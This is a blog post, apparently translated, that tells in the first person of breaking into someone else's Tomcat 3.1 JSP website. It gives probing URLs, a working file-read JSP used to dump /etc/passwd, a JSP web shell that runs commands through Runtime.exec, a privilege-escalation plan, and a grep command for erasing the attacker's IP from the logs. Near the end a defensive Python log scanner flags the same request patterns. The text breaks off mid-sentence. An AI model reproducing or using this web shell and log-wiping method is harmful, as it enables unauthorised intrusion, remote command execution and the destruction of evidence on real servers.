Saturday, 29 August 2015

JSP Hacking



By chance I came across a website whose pages looked fresh and pleasant. The site was developed in JSP, and out of personal interest I decided to test the security of the system.

telnet www.target.com 8080 

GET /CHINANSL HTTP/1.1
[Enter] 
[Enter] 


It returned the following:


HTTP/1.0 404 Not Found 

Date: Sun, 08 Jul 2001 07:49:13 GMT 
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en 
Content-Type: text/html
Status: 404 

<h1>Error: 404</h1>

<h2>Location: /CHINANSL</h2> File Not Found <br> /CHINANSL


The web server identifies itself as Tomcat 3.1. I remember that vulnerabilities in this version had already been found and posted to Bugtraq.

I recalled that the ".." technique can probably escape the web directory, so I tried:


http://target:8080/../../../../%00.jsp (did not work)

http://target:8080/file/index.jsp (did not work)
http://target:8080/index.JSP (did not work)
http://target:8080/index.jsp%81 (did not work)
http://target:8080/index.js%70 (did not work)
http://target:8080/index.jsp%2581 (did not work)
http://target:8080/WEB-INF/ (did not work)


It seemed the security situation was pretty good, so let us test deeper. Tomcat 3.1 ships with a management tool that lets you view the directories and files under the web root and add contexts. So I tried:


http://target:8080/admin/ 



The administrator really had not removed or disabled access to this directory; from a security point of view this has to count as a rather serious mistake.


Then I clicked the "VIEW ALL Context" button, which listed the names of files and directories under the web directory, and I soon found a file-upload component that would upload a JSP file into the target's web directory:


<%@ page import="java.io.*" %>

<%
// Opens whatever path the "file" parameter names and echoes it line by line;
// the path is never validated, so any file the server process can read is returned.
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try {
    fis = new FileInputStream(file);
    dis = new DataInputStream(fis);
    while (true) {
        try {
            str = dis.readLine();
        } catch (Exception e) {}
        if (str == null) break;
        out.print(str + "<br>");
    }
} catch (IOException e) {}
%>


Then I requested:


http://target:8080/upload/test.jsp?file=/etc/passwd 




This displayed the passwd file. The next step, trying to guess the passwords, did not succeed. However, this was now as good as having a shell, with IE as the first shell environment.

I wrote another JSP file:

<%@ page import="java.io.*" %>

<%
// Runs the "cmd" parameter with the web server's privileges and streams the
// command's standard output back into the page.
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char) c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>


Then I uploaded this JSP through the upload component and used it as a shell:


http://target:8080/upload/cmd.jsp?cmd=ls+-la+/ 

(output omitted here)


How to gain root privileges? After some searching I found that the system had MySQL installed, and the JSP source code contained the MySQL password. I ran:


http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld



It showed:


root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql



The system was running MySQL as root. Then I thought: knowing the MySQL password, I could write a shell program, create a table, put my data into the table, and then use "select ... into outfile" to create a file on the system, so that my program runs when a user performs su. (Remember the apache.org intrusion? The hackers used this approach.)


After that it would be relatively simple: upload and run a program such as a bindshell; although it would run as nobody, the su trick could help create a setuid shell to become root.


However, the next actual step produced a surprising result:


http://target:8080/upload/cmd.jsp?cmd=id 



It showed:


uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx) (xxx) (xxx) (xxx) (xxx),31(xxx)



The web shell had been root all along! What on earth had the administrator done with the security settings?


http://target:8080/upload/cmd.jsp?cmd=ps+aux 

It really was running as root (output omitted).


What remained to do:


1. Delete my telnet records.


2. Delete the HTTP logs.


The way I clear a log: cat xxx | grep -v "IP" >> temp, then overwrite the log file with the modified temp.
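As an added defensive example (not code from the original post), here is a small Python scanner that flags, in Tomcat-style access-log lines, the request patterns this write-up walks through: traversal and null-byte paths, double-encoded paths, the /admin/ and /WEB-INF/ contexts, and JSP requests carrying a cmd parameter or an absolute file parameter. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed Tomcat-style access-log lines (common log format) modelled on the
# requests in the write-up; the client addresses and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2001:07:50:02 +0000] "GET /../../../../%00.jsp HTTP/1.0" 404 0
10.0.0.5 - - [08/Jul/2001:07:50:40 +0000] "GET /index.jsp%2581 HTTP/1.0" 404 0
10.0.0.5 - - [08/Jul/2001:07:51:10 +0000] "GET /WEB-INF/ HTTP/1.0" 404 0
10.0.0.5 - - [08/Jul/2001:07:52:00 +0000] "GET /admin/ HTTP/1.0" 200 1834
10.0.0.5 - - [08/Jul/2001:07:55:31 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 2201
10.0.0.5 - - [08/Jul/2001:07:58:07 +0000] "GET /upload/cmd.jsp?cmd=id HTTP/1.0" 200 97
10.0.0.9 - - [08/Jul/2001:08:01:00 +0000] "GET /index.jsp HTTP/1.0" 200 5120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    reasons = []
    parts = urlsplit(target)
    # Decode twice so a double-encoded byte (%2581 -> %81) is caught as well.
    once, twice = unquote(parts.path), unquote(unquote(parts.path))
    if ".." in twice:
        reasons.append("traversal sequence")
    if "\x00" in twice:
        reasons.append("null byte in path")
    if once != twice:
        reasons.append("double-encoded path")
    lowered = twice.lower()
    if lowered.startswith("/admin/"):
        reasons.append("Tomcat admin context")
    if lowered.startswith("/web-inf/"):
        reasons.append("WEB-INF access")
    params = parse_qs(parts.query, keep_blank_values=True)
    if "cmd" in params:
        reasons.append("command parameter on JSP")
    if any(v.startswith("/") or ".." in v for v in params.get("file", [])):
        reasons.append("absolute or traversing file parameter")
    return reasons

def scan(log_text):
    hits = []  # (client, target, status, reasons) for every flagged request
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not in common log format; skip rather than guess
        client, _method, target, status = match.groups()
        reasons = classify(target)
        if reasons:
            hits.append((client, target, int(status), reasons))
    return hits
```

Because the write-up ends with the attacker filtering his own address out of the local log, a check like this is only worth running on a copy of the log shipped off the web host.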


To be clear, I did not replace the site's pages, because I am just a network security enthusiast. So I sent an email to tell the system administrator! Of course, in the letter I mentioned the way
